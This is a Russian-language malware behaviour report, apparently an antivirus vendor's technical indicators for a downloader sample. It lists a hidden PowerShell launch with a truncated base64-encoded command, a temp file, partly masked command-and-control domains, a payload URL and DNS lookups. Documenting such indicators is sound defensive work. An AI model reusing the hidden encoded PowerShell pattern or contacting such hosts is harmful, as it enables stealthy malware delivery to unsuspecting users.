Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAHQAbgB1AHYAbwBuAGkAbABoAHoAPQAnAFkAaABoAG0AdwBpAGMAcQBkAHQAJwA7ACQAQgBuAGsAcABnAGQAdwBsACAAPQAgACcANgAwADgAJwA7ACQASwBxAGoAcwByAGMAcgBuAGMAeQBmAD0AJwBZAG4...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
- %TEMP%\1063880.cvr
- 'rp###upltd.com':80
- 'kr####samachar.com':443
- 'yz##h.com':443
- http://rp###upltd.com/4hikw/rBKp/
- 'kr####samachar.com':443
- DNS ASK rp###upltd.com
- DNS ASK si###s.com.br
- DNS ASK mi####liberados.com
- DNS ASK kr####samachar.com
- DNS ASK yz##h.com